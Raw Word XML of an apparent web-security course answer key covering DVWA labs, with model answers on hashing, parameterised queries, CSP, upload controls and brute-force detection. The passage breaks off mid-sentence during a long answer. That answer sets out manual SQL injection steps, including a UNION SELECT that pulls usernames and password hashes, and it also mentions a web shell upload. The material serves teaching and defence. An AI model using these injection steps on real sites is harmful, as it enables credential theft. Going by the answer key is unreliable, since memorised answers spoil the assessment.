          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Answer Key</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975"/>
        <w:gridCol w:w="975"/>
        <w:gridCol w:w="7796"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Q#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="975"/>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Answer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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This is a classic Insecure Direct Object Reference under Broken Access Control.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Repeater is designed for manual, repeated resending of one request with modifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Incrementing ORDER BY values until an error occurs reveals the column count.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Parameterised queries separate SQL structure from user input, the root-cause fix for SQLi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Stored XSS fires for all visitors without needing them to click a crafted link each time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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CSP restricts which script sources the browser will execute, blocking many injected scripts as a defence-in-depth measure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Extensions and MIME types are both attacker-controlled; the actual file content/signature is authoritative.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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The browser's automatic cookie attachment is what lets a forged cross-site request appear authenticated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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B</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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Sniper iterates one payload set through one position at a time — ideal for a single login-field brute force.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7796"/>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In the official OWASP 2021 list, SSRF is A10; the syllabus in this course lists it as A08, which this unit explicitly flags as a difference to be aware of.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-Answer Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The passwords you extracted via SQL Injection are MD5 hashes. Why is MD5 insufficient for password storage, and what should be used instead?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">MD5 is fast to compute and has widely available precomputed (rainbow table) lookups for common passwords, so extracted hashes can often be reversed almost instantly. Slow, salted, purpose-built algorithms such as bcrypt, scrypt or Argon2 should be used instead, as their deliberate slowness and per-password salting make large-scale cracking impractical.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> How would a parameterised query prevent SQL injection?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A parameterised query sends the SQL command structure and the user-supplied values to the database as two separate channels. The database treats the value purely as data, never as part of the SQL syntax, so an injected string like "' OR '1'='1" is searched for literally rather than being interpreted as query logic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What is Content Security Policy (CSP) and how does it defend against XSS?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CSP is an HTTP response header that tells the browser which sources of scripts and other content it is allowed to execute. Even if an attacker successfully injects a script via an XSS flaw, a correctly configured CSP (e.g. disallowing inline scripts and external script sources) will stop the browser from running it, providing a strong secondary layer of defence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The file upload vulnerability on DVWA allowed a PHP web shell. List three server-side controls that would have prevented this.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1) Validate the uploaded file's true type by its content/signature rather than its extension or MIME type. 2) Store uploaded files outside the web root or rename them to remove any executable extension. 3) Configure the web server to never execute scripts from the uploads directory, regardless of file extension.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> From a defender's perspective, what detection rule would alert on a brute-force attack against a login form?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EEF3F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E7C7B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Model answer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A rule that counts failed login attempts per source IP (or per targeted username) within a short time window and alerts when that count exceeds a threshold — for example, more than 20 failed attempts in 5 minutes — which would catch the pattern produced by a Burp Intruder Sniper sweep or a similar automated tool.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-Answer / Descriptive Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain the complete manual SQL Injection testing and data-extraction process a tester would follow against DVWA, from confirming the vulnerability to extracting the users table, including how testing differs between Low and Medium security levels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing begins by confirming an injection point exists: submitting a single quote (') into the vulnerable parameter and observing a database error or a change in application behaviour compared to a normal value confirms the input is being inserted into a SQL query unsafely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once confirmed, UNION-based extraction proceeds in stages. First, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used with increasing column numbers until an error appears, revealing the exact number of columns the original query selects. Second, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT null, null, ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (matching that count) confirms which of those columns are actually rendered on the page. Third, the null placeholders are replaced one at a time with useful data — first database functions like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">version()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to confirm the database name and engine, then queries against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tables to enumerate table and column names, and finally a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT user, password FROM users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to extract the actual usernames and password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Low security</w:t>
      </w:r>
      <w:r>
